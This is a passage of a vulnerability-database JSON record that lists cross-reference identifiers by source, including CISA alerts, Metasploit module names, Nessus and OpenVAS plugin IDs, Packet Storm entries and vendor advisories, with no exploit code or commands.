"21DA1B2C-2176-5C7C-9A56-480839AAC71E", "26F1DC1C-5D5D-5D8B-8DDB-890968225F0B", "27F3F58D-9FEF-5F4F-91FB-0D93B481FBA4", "2849E613-8689-58E7-9C55-A0616B66C91A", "28F1E5F0-F489-559C-A1C3-C14BC0D51B93", "28F899A8-D565-51D0-A9B5-5B2B631407EB", "291B5382-1EED-522B-869C-C2AFDC4AB400", "2BE2BF2C-B78F-5C34-A4D4-484F0E6B6D9C", "2C33B9C6-636A-5907-8CD2-119F9B69B89B", "2D3AD059-4772-527B-A78C-724AFA1B109F", "2D3B67A4-8F34-55EA-A7ED-97FB2D1DFFF8", "306622D1-6E5F-53BE-AE3D-A17E5DAC3F50", "30863E3B-BC4C-5B00-B21E-E9C67ECF8BA9", "31DB22CD-3492-524F-9D26-035FC1086A71", "328E8BFC-210D-5993-885E-7710FEE734CC", "33E38C38-2570-5B7D-910F-D6D0C9B85E25", "34097FEA-E06F-5637-817F-25A5BA9D5B34", "350E6199-FA83-5A2F-91D3-19E2D2921801", "36AAE05E-CAAA-5F55-AA88-65599F1EAA1C", "370515CC-C819-5D01-917D-2DF4728A28F4", "37EBD8DB-50D9-5D1E-B6AB-31330A7C47C7", "39093366-D071-5898-A67D-A99B956B6E73", "39732E15-7AF0-5FC2-851B-B63466C0F2F2", "3AEA79E9-5CA7-5210-9CAC-5E34F8E0C418", "3BFD8B83-5790-508D-8B9C-58C171517BD0", "3CAE8C9E-534F-5617-88B5-977EE6076A10", "3D70055A-AC27-5338-B4C8-D1ED2158F5C9", "4141B394-8FC2-5D74-B0A2-3A1F5DF6905E", "41FED3D6-8A23-5549-A390-D444A882F85D", "42C0F4E5-C3C8-5987-AF1E-3EB9DC15EADE", "431446A1-D76F-5889-BBDD-1C55456A4D73", "4577EA1C-992F-5AA5-86B6-9749FBDFC45D", "45A4CAC6-39DD-5F6D-B0C4-9688EF931746", "462438E9-2947-5006-9134-9BA0BCC1B262", "46B4DA3A-0DEC-5F0E-980A-B17A1CB688F1", "46FA259E-5429-580C-B1D5-D1F09EB90023", "47353949-6FA1-5C88-86DB-8E2DFD66576A", "498E3F5C-3DFB-5A3F-BFE8-BEB7339F0C2E", "49D58681-03E3-5607-8475-366F990C3706", "4B25D88E-3B3F-5756-B942-7244492EB7F4", "4C03A6F0-84D7-565A-B0D8-DE45D804A835", "4C2C36F6-5E15-51DD-85A7-E5828F1D8CE0", "4E477E4A-4794-5B4A-8706-915B06422C95", "504A0052-A0EB-53EA-AFC3-4E5EEC236795", "523F993F-2487-5C75-A910-22605D6D57D9", "52814444-4FCC-517B-B4B3-6DC5C4A27AA6", "5562A10B-A754-5E2C-9FCA-88EA38C98CBD", "560405C4-4806-5173-B662-F9C3D776D8D4", "5B55C912-08F2-542D-B6F4-EE8AF664AEAC", "5DD13827-3FCE-5166-806D-088441D41514", "607F0EF9-B234-570A-9E89-A73FBE248E6F", "6102FE6D-37F6-572D-8877-F3A0D49FC22D", "62891769-2887-58A7-A603-BCD5E6A6D6F9", "62ED9EA6-B108-5F5A-B611-70CC6C705459", "63D5015A-CD15-54CF-A1CB-67AEEEFFB789", "6531DE99-76A6-5374-998A-30AC54C10711", "656CA49C-78E0-596B-BAA2-1A2890C0E150", "66506397-D518-518F-B4A6-3C3F99602E30", "6787DC40-24C2-5626-B213-399038EFB0E9", "697CC4E5-B8C5-57DA-8E6E-C44C37811757", "6A34D376-A589-5117-B34C-668A898CD6F2", "6AF629CA-DC22-5740-AC2B-CA18189D299D", "6B67D619-5DD1-507C-9028-561DC01DC062", "6CA1F5F4-917A-534B-9ED6-6065C00689AF", "721C46F4-C390-5D23-B358-3D4B22959428", "74F3783A-C87E-56C3-91DB-25921D7EC82E", "757B9105-ADEF-5B27-8B1F-A06AE0566065", "75BE41BF-9117-5065-8E2C-3F7F041E53AA", "75C1CD91-459D-5E2F-A3AC-FB4FE66230F7", "765DCAD5-2789-5451-BBFA-FAD691719F7A", "77912E98-768B-5AF5-AE06-1F42C6D88F72", "78155987-ACB5-51CD-99EB-FF372456D94D", "796841FC-B75D-5F42-B0E7-7FF15A74E5C1", "7D04F2C9-F17B-502A-BBE9-9B5CA537E468", "7F937E02-A1B2-5F78-B140-90BC298729D4", "8005DDB7-67F0-50C1-95AC-3D602A70CEC8", "84FC95F2-00DB-57F5-A2B1-DE1C4D9C77E1", "851959DE-3B5C-5317-868E-5D80E801E3B0", "88373793-9076-5F05-BDBB-635A7E1BD897", "8BAEEC14-CD55-5C55-A910-47030BEA55F7", "8C937DCD-4090-5A44-9361-4D9ECF545843", "8CBB7F58-891D-5105-B269-029C59A9C3C9", "92A57BC1-BAC9-5C0F-951A-E1FF05D87142", "92BBBF7B-026E-553A-883B-AEF503046C18", "9304254B-557D-5DFE-AF8D-E21D0DF1FFDF", "94095106-8E25-54E1-924C-2C3B4E99610F", "988A0BAB-669A-57AE-B432-564B2E378252", "998F5B8B-817B-5B22-BEBB-11F0DC59638F", "9A0A7E66-6C4F-56E6-8F29-1DCE34FA1D12", "9A29EBA1-E786-5DD5-B661-E0080DEEB613", "9C32E281-E6FB-587D-9ECC-F961B7082D43", "9D170C46-A745-5692-BA84-67EBFEA037FF", "9DA6E85F-7AF2-5EE3-BF5C-A430C8DA3C4D", "9FE15986-BAC9-5740-8189-23E26F8399D5", "A04C30E0-722D-5CF4-B80A-547C1C702024", "A1FEA8E3-60B5-5828-A65B-98AA56545D78", "A423A009-0EEA-569D-AFFE-89EC01F7CDF7", "A43D1B77-D6EF-5570-AF16-6320A544CE0A", "A48A7BCD-4B97-5BDB-A571-3B8DF0069FB9", "A4E7A7FA-3876-5263-8290-CAB45A4A2F1F", "A4F047D6-CD61-5E9D-86EF-FB824CE2625F", "A7CA20BB-BCF9-52C0-A708-01F9ADECB1AC", "A839FA86-0873-592C-AA31-2C445B4C4F29", "A8BE443F-B43C-5460-9DBF-0E7C65078EF2", "A96AA4B1-C8BB-579A-8D24-BC5F3628A0A4", "AA7339B7-CAB1-5DEA-8E7C-5867B328A25F", "AAC2853C-A655-5E80-9262-A654102B874A", "AC9BE6BA-8352-57D6-80E3-8BB62A0D31C2", "ACE1EC69-37E6-58A5-8C0B-96212CDB38DF", "AE03C974-B00F-5DF7-B2AF-77D6E46CD5FD", "AE9D3A7C-7BEB-54EA-9C61-A03C494D5EDD", "B042A63E-E661-5B8E-9AA1-F0DEE4C18402", "B3DCB90F-80B1-5462-AC61-AF04513F2F3A", "B3FAEE67-7743-52ED-89D0-D83BAEA1A38D", "B417316F-A794-5234-BC9E-475C438FC35C", "BA12D007-F6E5-5BB6-874F-789DCAE9524E", "BA9FEAFF-DC39-53B5-B03D-8A01486E0879", "BBEEB41B-D67F-54B6-BA27-1956F83AAAC5", "BC6A00C7-AE9A-533B-87DE-DD27240A818C", "BE2B1B45-11AE-56F2-A5B4-2497BAE3B016", "BE88205A-26D3-5EFE-B8CC-828EE7E33C86", "BE90B1DD-521D-540C-8554-5454779256A5", "BEDCA78A-B03B-5065-AB50-3AC902332B03", "BEF7E47B-985F-56DE-AD21-DFEF507AAFE1", "C3AF7933-1DDE-58AB-BF32-75FEDB10C925", "C467EA51-59B6-5BEB-A634-62EFC2DC4419", "C4A313B8-6946-51D9-A5C4-EF515BAC47C9", "C50B5DBC-9051-5380-B5B3-93A023128F22", "C641C472-7F12-5C7B-9934-BE59C8B1974B", "C790841B-11B6-5497-B6DB-EF8A56DD8A0C", "C82E0A5A-3070-5ED4-A0CF-B3E342C5E0C1", "C89AC173-55D4-50C8-A17E-42EB65710CCB", "C9FCD26D-4C04-5F36-8E61-05484E6979D6", "CA1AFE75-C90A-5C21-92B0-FC1C0282B767", "CA34E4C9-BC58-5284-81F7-EC6AC06EC7AF", "CA7DF0EF-7032-54E3-B16E-D0845CE73845", "CD0102AD-F33A-5068-9719-30CB0CB3C152", "CF1C1A91-4D20-553C-A027-71BE18F8BAA5", "CF9EC818-A904-586C-9C19-3B4F04770FBD", "D07D56B4-40BB-511F-B7EA-EF5B1544D876", "D166D6FD-186D-5EE5-951A-8AB30D45EA32", "D2A01405-1B4C-5B8D-85AC-D1E23D1F3B56", "D4308421-E113-5104-8D37-4FB75AE2D7DC", "D4572C36-FAE8-5802-9B48-CF143220B909", "D4DF3FFF-4FBA-5ADB-88FC-A7E1BED572B9", "D6710F36-D7F3-57EA-BD83-CED78FC054F6", "D7EF2A21-5BA9-5730-90E0-E085DDFD2801", "D8B68D98-BBF3-5A69-82DD-C0760C9923D4", "D8BEFAC3-BA4E-5E7E-8553-B512E126AD53", "DB6F697E-55A0-538F-A15B-E61B8B4E4D70", "DC044D23-6D59-5326-AB78-94633F024A74", "DC8A29A1-755A-50C2-9D9D-FF11FCB054F2", "DE558F67-26A7-5F03-AD15-C2087B81E69F", "DEF06C66-815B-54B3-A5CC-951F37453002", "DF00B503-1F21-5ABD-B713-1F79E4D1CB9A", "E22A392B-5D30-51F4-92ED-8E10BA7EE8D2", "E2C6B714-1F75-5584-B0B3-280C3B36C014", "E3BF7E8E-58EA-5BC5-A6F4-401912FFB4BE", "E3D6A7AD-AC9C-55EB-A993-B78D05403B54", "E46AAFC9-276F-5161-B013-393D9A538259", "E5B0F794-87CD-5152-9D64-3AB23AF5C3EF", "E72D9129-EEED-5E3C-9CD8-9BD6201170C0", "E7B26D35-BAFD-51CB-BFAC-CA7E5EA5FA9A", "E8AD52BD-4EE5-5E85-91FE-66A868E0162B", "EA2EA382-C5B7-54EF-8547-EDDD15EA1B85", "EAFD9DBC-1E36-570B-9F48-8C355BBFD8E6", "EBBEA4C3-D6F9-53AF-BBE9-D3438C945AB4", "EBF17036-7547-54B5-B0D6-B465FE6C9873", "EE2763B9-CDEA-5FAF-91CF-8B6902DD2E56", "EE4C8DE4-3366-58B0-9494-7FD5B6F9D0EF", "F1CA855B-967C-5A5E-9256-FDDE87702713", "F2165DE4-7724-559C-A733-DE9F244DA408", "F22160B4-2E80-5B7D-8238-95D7833F6D73", "F27B127B-57F0-5352-B92F-B6F921378CBB", "F3D87CA2-44D8-583C-AF7F-85AA53FB6CAD", "F5B92B0D-E802-5254-8668-D6A4B1DB8004", "F775D2F3-FF1F-529F-B0F3-99AB6A801264", "F922DD70-E22B-5EBE-9CAE-410224E95831", "F9EF1801-C66C-572B-B67A-9A67E04D6B06", "FBA74A16-061A-5741-B662-B77D2C6DF28F", "FBB9B577-00A5-5C82-AFC5-4A52422056F3", "FE544217-2BB0-5C05-B26C-D14EE378E8A5", "FFBF7B7B-FFD8-5A32-89B0-AAB175FD2AE6", "FFF6224F-273A-5CB1-9421-833769E01519"]}, {"type": "googleprojectzero", "idList": ["GOOGLEPROJECTZERO:2E85097DC4FBE492B1CB6FAE84AFE126", "GOOGLEPROJECTZERO:CA925EE6A931620550EF819815B14156"]}, {"type": "hackerone", "idList": ["H1:1174185", "H1:1519841", "H1:322935", "H1:518637", "H1:536130", "H1:538771", "H1:541858", "H1:591295", "H1:617543", "H1:632721", "H1:671749", "H1:671857", "H1:678496", "H1:680480", "H1:695005", "H1:713900", "H1:838196", "H1:913695"]}, {"type": "hivepro", "idList": ["HIVEPRO:FD730BCAD086DD8C995242D13B38EBC8"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20190529-01-WINDOWS"]}, {"type": "ibm", "idList": ["44D4BE9C6B3A5CA2D7E393A0C6B1DE6752C9B6BDF8F6BC23CA690D4063D3152B", "9A19B1A61B0A4ADFDBA9E428552BF21656703586B14AC314FFC9B663C7D9BDEB", "B2EA2FBA4D280351FEA7F9EC1921C448D44F4D9EC613590A87A15467F7D34153", "DAB88099018B311F83DAFDB9431625A326A00FF72BE126856DCECA1262D7C308", "DB866DC8DC23646847AE5E9E25C02B2DF2A195A414B2734DCAA102E637957BAF", "DDAE44367545E909F1C5E82BA6B48DEA1D51F717CEAE6CED7805AFEA883D85F1"]}, {"type": "ics", "idList": ["AA19-168A", "AA20-010A", "AA20-014A", "AA20-020A", "AA20-031A", "AA20-099A", "AA20-107A", "AA20-126A", "AA20-133A", "AA20-206A", "AA20-258A", "AA20-259A", "AA20-275A", "AA20-283A", "AA20-296A", "AA20-296B", "AA21-110A", "AA21-116A", "AA21-200B", "AA21-209A", "AA22-011A", "AA22-047A", "AA22-055A", "AA22-117A", "AA22-158A", "AA22-279A", "AA23-074A", "ICSA-21-077-03", "ICSMA-20-049-01"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:4124E2CCDA610C6D222319C47C8D3250", "IMPERVABLOG:4F187FDBA230373382F26BA12E00F8E7", "IMPERVABLOG:6F67E97EF55C748CBFEE482E85D4751A", "IMPERVABLOG:A1972445B3E03EDA92E53FFFBD6771BD", "IMPERVABLOG:A30E92D9B177CCFF9F5476DD34E25F51", "IMPERVABLOG:BB987E93C1A58280077D98CF497FD72D"]}, {"type": "kaspersky", "idList": ["KLA11460", "KLA11493", "KLA11639", "KLA11647", "KLA11664", "KLA11706", "KLA11720", "KLA11874", "KLA11875"]}, {"type": "kitploit", "idList": ["KITPLOIT:102871766956097088", "KITPLOIT:1049860926455958760", "KITPLOIT:1207079539580982634", "KITPLOIT:1225614657733366094", "KITPLOIT:1494860154339275183", "KITPLOIT:1844185171331211854", "KITPLOIT:1986765330027575502", "KITPLOIT:2730308475904875028", "KITPLOIT:3080370456145673111", "KITPLOIT:3124960652240981745", "KITPLOIT:3245813529202482542", "KITPLOIT:3359946123198241398", "KITPLOIT:3397940664053959113", "KITPLOIT:3565898196234868215", "KITPLOIT:4019975092566820832", "KITPLOIT:4205221140433081492", "KITPLOIT:43221571859278589", "KITPLOIT:4421457840699592233", "KITPLOIT:4482238198881011483", "KITPLOIT:4707889613618662864", "KITPLOIT:5052987141331551837", "KITPLOIT:5420210148456420402", "KITPLOIT:5485948766090500662", "KITPLOIT:5528727998547000766", "KITPLOIT:5769166566971079899", "KITPLOIT:5896951739767119270", "KITPLOIT:6073614302403805969", "KITPLOIT:6082359615438809301", "KITPLOIT:6972580572774284552", "KITPLOIT:724832466163115459", "KITPLOIT:727243444931520192", "KITPLOIT:777119556142010019", "KITPLOIT:7915799087007906859", "KITPLOIT:8309365460568193500", "KITPLOIT:8418780960315245103", "KITPLOIT:998955151150716619"]}, {"type": "krebs", "idList": ["KREBS:58D4F859AA2566B4BCE221DB78B85548", "KREBS:62E2D32C0ABD1C4B8EA91C60B425255B", "KREBS:92A33A0E1BB183F4EF513731C0304581", "KREBS:95DEE0244F6DE332977BB606555E5A3C", "KREBS:9D9C58DB5C5495B10D2EBDB92549B0F2", "KREBS:C93CCA23099AC250E702848B49677D5B", "KREBS:DF8493DA16F49CE6247436830678BA8D", "KREBS:F9486A3FDB624FD485CEA4ECAFAF3CCA"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:31DFC46E307127AF5C9FD13F15DF62DB", "MALWAREBYTES:5899EF0CF34937AFA2DB4AB02D282DF6", "MALWAREBYTES:5B32671B820EEB03840B798BCEA9FDC8", "MALWAREBYTES:60B52235DCBD12E98C7DB46F859F885C", "MALWAREBYTES:6ECB9DE9A2D8D714DB50F19BAF7BF3D4", "MALWAREBYTES:80B21E934B1C43C7071F039FE9512208", "MALWAREBYTES:8B41C7471B07595F7246D3DCB8794894", "MALWAREBYTES:BAB94968DD1EC37DA6F977226977DAF5", "MALWAREBYTES:D081BF7F95E3F31C6DB8CEF9AD86BD0D", "MALWAREBYTES:D7EFF87E8AB1DBEC63A0DBE7F8DA90B8"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY-SCANNER-HTTP-CITRIX_DIR_TRAVERSAL-", "MSF:AUXILIARY-SCANNER-RDP-CVE_2019_0708_BLUEKEEP-", "MSF:EXPLOIT-FREEBSD-HTTP-CITRIX_DIR_TRAVERSAL_RCE-", "MSF:EXPLOIT-MULTI-HTTP-CONFLUENCE_WIDGET_CONNECTOR-", "MSF:EXPLOIT-MULTI-MISC-WEBLOGIC_DESERIALIZE_BADATTRVAL-", "MSF:EXPLOIT-WINDOWS-HTTP-EXCHANGE_ECP_VIEWSTATE-", "MSF:EXPLOIT-WINDOWS-HTTP-TELERIK_RAU_DESERIALIZATION-", "MSF:EXPLOIT-WINDOWS-LOCAL-CVE_2020_0787_BITS_ARBITRARY_FILE_MOVE-", "MSF:EXPLOIT-WINDOWS-RDP-CVE_2019_0708_BLUEKEEP_RCE-"]}, {"type": "mmpc", "idList": ["MMPC:27EEFD67E5E7E712750B1472E15C5A0B", "MMPC:4A6B394DCAF12E05136AE087248E228C", "MMPC:9AAC6D759E6AD62F92B56B228C39C263", "MMPC:CBEDB87F4D35A5FD3EE19BAA5965FC1B", "MMPC:E537BA51663A720821A67D2A4F7F7F0E"]}, {"type": "mscve", "idList": ["MS:ADV200002", "MS:CVE-2019-0708", "MS:CVE-2019-0803", "MS:CVE-2019-1040", "MS:CVE-2020-0601", "MS:CVE-2020-0688", "MS:CVE-2021-26855", "MS:CVE-2021-26857", "MS:CVE-2021-26858", "MS:CVE-2021-27065"]}, {"type": "mskb", "idList": ["KB4534273", "KB4536987", "KB4536988", "KB4536989"]}, {"type": "msrc", "idList": ["MSRC:181F9F2B53D93B5825CF48DFEB8D11C7", "MSRC:4D3D99779455BE99499289F3B3A35F84", "MSRC:6A6ED6A5B652378DCBA3113B064E973B", "MSRC:742C7794FE62E20994070CC0C55D90C3", "MSRC:9FA59725E0E2287517314198EB45ED26", "MSRC:C264A0152D9C51F56714066CBFFAF16B", "MSRC:CC5707634DE28783ABF066B3B22F9E19", "MSRC:E6F280AD39764DECA8E706FC572BCD8F"]}, {"type": "mssecure", "idList": ["MSSECURE:27EEFD67E5E7E712750B1472E15C5A0B", "MSSECURE:4A6B394DCAF12E05136AE087248E228C", "MSSECURE:748E6D0B920B699D6D088D0AD4422C46", "MSSECURE:9A5D03B503C4E238EEFD4BF9E93C78A9", "MSSECURE:9AAC6D759E6AD62F92B56B228C39C263", "MSSECURE:B42B640CBAB51E35DC07B81926B5F910", "MSSECURE:CBEDB87F4D35A5FD3EE19BAA5965FC1B", "MSSECURE:E0AA6CC56D602890BBD5AF46A036FE67", "MSSECURE:E3C8B97294453D962741782EC959E79C", "MSSECURE:E537BA51663A720821A67D2A4F7F7F0E"]}, {"type": "myhack58", "idList": ["MYHACK58:62201784367", "MYHACK58:62201889920", "MYHACK58:62201993579", "MYHACK58:62201994152", "MYHACK58:62201994153", "MYHACK58:62201994154", "MYHACK58:62201994162", "MYHACK58:62201994234", "MYHACK58:62201994259", "MYHACK58:62201994388", "MYHACK58:62201994853", "MYHACK58:62201995234", "MYHACK58:62201995523", "MYHACK58:62201995674", "MYHACK58:62201995881"]}, {"type": "nessus", "idList": ["700223.PRM", "700661.PRM", "701078.PRM", "701262.PRM", "701265.PRM", "701277.PRM", "7286.PASL", "ALA_ALAS-2018-970.NASL", "CISCO-SA-20200205-IOSXR-CDP-RCE.NASL", "CITRIX_CTX276688_DIRECT_CHECK.NBIN", "CITRIX_NETSCALER_CTX267027.NASL", "CITRIX_NETSCALER_CTX276688.NASL", "CITRIX_SDWAN_WANOP_MULTIPLE_VULNS.NASL", "CITRIX_SSL_VPN_CVE-2019-19781.NBIN", "COLDFUSION_WIN_APSB18-14.NASL", "CONFLUENCE_6_6_12.NASL", "CONFLUENCE_CVE-2019-3396.NASL", "CROWD_3_4_4.NASL", "CROWD_CVE-2019-11580.NASL", "DEBIAN_DLA-1274.NASL", "DEBIAN_DSA-4110.NASL", "DRAYTEK_VIGOR_UNAUTH_RCE.NASL", "EULEROS_SA-2022-2731.NASL", "EULEROS_SA-2022-2766.NASL", "EXIM_4_90_1.NASL", "F5_BIGIP_SOL30518307.NASL", "F5_BIGIP_SOL52145254.NASL", "F5_CVE-2020-5902.NASL", "FEDORA_2018-25A7BA3CB6.NASL", "FEDORA_2018-5AEC14E125.NASL", "FREEBSD_PKG_2BAB995F36D411EA9DAD002590ACAE31.NASL", "FREEBSD_PKG_316B3C3E0E9811E88D4197657151F8C2.NASL", "GENTOO_GLSA-201803-01.NASL", "MANAGEENGINE_DESKTOP_CENTRAL_100479.NASL", "MANAGEENGINE_DESKTOP_CENTRAL_CVE-2020-10189.NBIN", "MICROSOFT_EDGE_CHROMIUM_79_0_309_68.NASL", "MSRDP_CVE-2019-0708.NBIN", "OPENSUSE-2018-170.NASL", "OPENSUSE-2021-677.NASL", "ORACLE_ACCESS_MANAGER_CPU_JUL_2021.NASL", "ORACLE_COHERENCE_CPU_JAN_2020.NASL", "ORACLE_WEBCENTER_PORTAL_CPU_OCT_2020.NBIN", "ORACLE_WEBLOGIC_SERVER_CPU_JAN_2016.NBIN", "ORACLE_WEBLOGIC_SERVER_CVE_2015_4852.NBIN", "PULSE_CONNECT_SECURE-CVE-2019-11510.NASL", "PULSE_CONNECT_SECURE-SA-44101.NASL", "PULSE_CONNECT_SECURE_PATH_TRAVERSAL.NBIN", "SMB_NT_MS19_APR_4493441.NASL", "SMB_NT_MS19_APR_4493446.NASL", "SMB_NT_MS19_APR_4493451.NASL", "SMB_NT_MS19_APR_4493464.NASL", "SMB_NT_MS19_APR_4493470.NASL", "SMB_NT_MS19_APR_4493471.NASL", "SMB_NT_MS19_APR_4493472.NASL", "SMB_NT_MS19_APR_4493474.NASL", "SMB_NT_MS19_APR_4493475.NASL", "SMB_NT_MS19_APR_4493509.NASL", "SMB_NT_MS19_JUN_4503267.NASL", "SMB_NT_MS19_JUN_4503273.NASL", "SMB_NT_MS19_JUN_4503276.NASL", "SMB_NT_MS19_JUN_4503279.NASL", "SMB_NT_MS19_JUN_4503284.NASL", "SMB_NT_MS19_JUN_4503285.NASL", "SMB_NT_MS19_JUN_4503286.NASL", "SMB_NT_MS19_JUN_4503291.NASL", "SMB_NT_MS19_JUN_4503292.NASL", "SMB_NT_MS19_JUN_4503293.NASL", "SMB_NT_MS19_JUN_4503327.NASL", "SMB_NT_MS19_MAY_4499149.NASL", "SMB_NT_MS19_MAY_4499164.NASL", "SMB_NT_MS19_MAY_XP_2003.NASL", "SMB_NT_MS20_FEB_EXCHANGE.NASL", "SMB_NT_MS20_JAN_4528760.NASL", "SMB_NT_MS20_JAN_4534271.NASL", "SMB_NT_MS20_JAN_4534273.NASL", "SMB_NT_MS20_JAN_4534276.NASL", "SMB_NT_MS20_JAN_4534293.NASL", "SMB_NT_MS20_JAN_4534306.NASL", "SYMANTEC_MESSAGING_GATEWAY_SYM17-006.NASL", "TELERIK_UI_FOR_ASPNET_AJAX_CVE-2019-18935.NASL", "UBUNTU_USN-3565-1.NASL", "WEBLOGIC_2015_4852.NASL", "WEB_APPLICATION_SCANNING_112521", "WEB_APPLICATION_SCANNING_98613", "WEB_APPLICATION_SCANNING_98638", "WEB_APPLICATION_SCANNING_98639", "WEB_APPLICATION_SCANNING_98640", "WEB_APPLICATION_SCANNING_98641", "WEB_APPLICATION_SCANNING_98656", "WEB_APPLICATION_SCANNING_98657", "WEB_APPLICATION_SCANNING_98658", "WEB_APPLICATION_SCANNING_98659", "WEB_APPLICATION_SCANNING_98660"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310105829", "OPENVAS:1361412562310108067", "OPENVAS:1361412562310108367", "OPENVAS:1361412562310108611", "OPENVAS:1361412562310108794", "OPENVAS:1361412562310140294", "OPENVAS:1361412562310704110", "OPENVAS:1361412562310806622", "OPENVAS:1361412562310813083", "OPENVAS:1361412562310814894", "OPENVAS:1361412562310815019", "OPENVAS:1361412562310815020", "OPENVAS:1361412562310815021", "OPENVAS:1361412562310815022", "OPENVAS:1361412562310815023", "OPENVAS:1361412562310815024", "OPENVAS:1361412562310815033", "OPENVAS:1361412562310815034", "OPENVAS:1361412562310815036", "OPENVAS:1361412562310815051", "OPENVAS:1361412562310815054", "OPENVAS:1361412562310815085", "OPENVAS:1361412562310815086", "OPENVAS:1361412562310815087", "OPENVAS:1361412562310815088", "OPENVAS:1361412562310815205", "OPENVAS:1361412562310815206", "OPENVAS:1361412562310815207", "OPENVAS:1361412562310815208", "OPENVAS:1361412562310815210", "OPENVAS:1361412562310815740", "OPENVAS:1361412562310815741", "OPENVAS:1361412562310815742", "OPENVAS:1361412562310815743", "OPENVAS:1361412562310815744", "OPENVAS:1361412562310815745", "OPENVAS:1361412562310815748", "OPENVAS:1361412562310815749", "OPENVAS:1361412562310815750", "OPENVAS:1361412562310843448", "OPENVAS:1361412562310851706", "OPENVAS:1361412562310874147", "OPENVAS:1361412562310874151", "OPENVAS:1361412562310891274"]}, {"type": "oracle", "idList": ["ORACLE:CPUAPR2017", "ORACLE:CPUJAN2016", "ORACLE:CPUJAN2018", "ORACLE:CPUJAN2020", "ORACLE:CPUJAN2021", "ORACLE:CPUJUL2020", "ORACLE:CPUJUL2021", "ORACLE:CPUOCT2016", "ORACLE:CPUOCT2017", "ORACLE:CPUOCT2020"]}, {"type": "osv", "idList": ["OSV:DLA-1274-1", "OSV:DSA-4110-1", "OSV:GO-2022-0535"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:143821", "PACKETSTORM:144405", "PACKETSTORM:147456", "PACKETSTORM:149926", "PACKETSTORM:152268", "PACKETSTORM:152568", "PACKETSTORM:153133", "PACKETSTORM:153627", "PACKETSTORM:154176", "PACKETSTORM:154579", "PACKETSTORM:155904", "PACKETSTORM:155905", "PACKETSTORM:155930", "PACKETSTORM:155947", "PACKETSTORM:155972", "PACKETSTORM:156592", "PACKETSTORM:156620", "PACKETSTORM:156730", "PACKETSTORM:156979", "PACKETSTORM:157054", "PACKETSTORM:157207", "PACKETSTORM:157795", "PACKETSTORM:158056", "PACKETSTORM:158333", "PACKETSTORM:158366", "PACKETSTORM:158581", "PACKETSTORM:159653", "PACKETSTORM:160047", "PACKETSTORM:161065", "PACKETSTORM:162959", "PACKETSTORM:162960", "PACKETSTORM:163810"]}, {"type": "ptsecurity", "idList": ["PT-2020-01", "PT-2020-04"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "QUALYSBLOG:01C65083E501A6BAFB08FCDA1D561012", "QUALYSBLOG:14FD05969C722B5BF3DBBF48ED6DA9C0", "QUALYSBLOG:282A52EA9B1F4C4F3F084197709217B0", "QUALYSBLOG:3B1C0CD4DA2F528B07C93411EA447658", "QUALYSBLOG:400D28FE44174674BB4561AA9416F532", "QUALYSBLOG:45B4EBB10CDE38B36A9C242F3D60C7A4", "QUALYSBLOG:563DC556FF331059CAC2F71B19B341B5", "QUALYSBLOG:66E92B63FC165BEAF707A9D6B2807033", "QUALYSBLOG:82E24C28622F0C96140EDD88C6BD8F54", "QUALYSBLOG:8DC9B53E981BBE193F6EC369D7FA85F8", "QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4", "QUALYSBLOG:9D071EBE42634FFBB58CB68A83252B41", "QUALYSBLOG:A28C30F71B1450A5D1A2C74AEBD22E6A", "QUALYSBLOG:AE1D32AF43539C7362B2E060204A5413", "QUALYSBLOG:AF3D80BA12D4BBA1EE3BE23A5E730B6C", "QUALYSBLOG:BC22CE22A3E70823D5F0E944CBD5CE4A", "QUALYSBLOG:CAF5B766E6B0E6C1A5ADF56D442E7BB2", "QUALYSBLOG:D38E3F9D341C222CBFEA0B99AD50C439", "QUALYSBLOG:DE1FEC2B9B661D42DAA0BA398DBFD24E", "QUALYSBLOG:FBDC4B445E6B33502BA1650A8BD4A6E1", "QUALYSBLOG:FD90A85F75806FE26BBC0970B56AFB9D"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:0C3EDBDC537092A20C850F762D5A5856", "RAPID7BLOG:3A2793FB5315EE3613661543700B783B", "RAPID7BLOG:5D8768D89A817B5475C9FEA3577FB0BC", "RAPID7BLOG:6A1F743B64899419F505BFE243BD179F", "RAPID7BLOG:7549D87CE6E6AE596B8031184231ECD1", "RAPID7BLOG:C90DF07E98E436DFBFCC5BA576D21019", "RAPID7BLOG:CBD7A5DA1DAAE9DCFD01F104F4B1B5FB", "RAPID7BLOG:E36C557104ECB6E144C21C3C499B0492", "RAPID7BLOG:E8EB68630D38C60B7DE4AF696474210D", "RAPID7BLOG:EAEC3BF3C403DB1C2765FD14F0E03A85", "RAPID7BLOG:F4F1A7CFCF2440B1B23C1904402DDAF2"]}, {"type": "redhatcve", "idList": ["RH:CVE-2018-6789"]}, {"type": "saint", "idList": ["SAINT:364F42DDB229F6E8A0EF4BB04CE504D2", "SAINT:38F4E0E6CE11A2F3EC10321A6DF373E2", "SAINT:4A51F090FB88D7C0687C235D80825104", "SAINT:50889C53D3A04E98F4F7E31365C75978", "SAINT:7C1EF5B76FC3A237B68C699EF952633A", "SAINT:880C926D2511DE57F08789A66AFE11F2", "SAINT:9870FA2AA27A04C7E50DC7E0A2A344D0", "SAINT:A9B0B05DC77287BBA5CCE7B14B30EB70", "SAINT:B8E045060F9ACF0F8D488745DBF66B54", "SAINT:EA211AC1CE6B335FAB2D22929BF61475"]}, {"type": "schneier", "idList": ["SCHNEIER:431597F9B05B18D767EC2998B8C5DD99"]}, {"type": "securelist", "idList": ["SECURELIST:094B9FCE59977DD96C94BBF6A95D339E", "SECURELIST:1B793FC976660636D7A37F563350F59A", "SECURELIST:355BE138D7CDD7D13D1F61F71F8406C4", "SECURELIST:35644FF079836082B5B728F8E95F0EDD", "SECURELIST:67C82A057DBE22C60DC2677D52D52ECD", "SECURELIST:78FB952921DD97BAF55DA33811CB6FE4", "SECURELIST:91CACDF02C22F17E70A0DC58D036F9DE", "SECURELIST:934E8AA177A27150B87EC15F920BF350", "SECURELIST:9C375DB331E2434EE824100A45629096", "SECURELIST:D0FFA6E46D43B7A592C34676F2EF3EDB", "SECURELIST:DF3251CC204DECD6F24CA93B7A5701E1", "SECURELIST:F05591B26EFD622E6C72E180A7A47154", 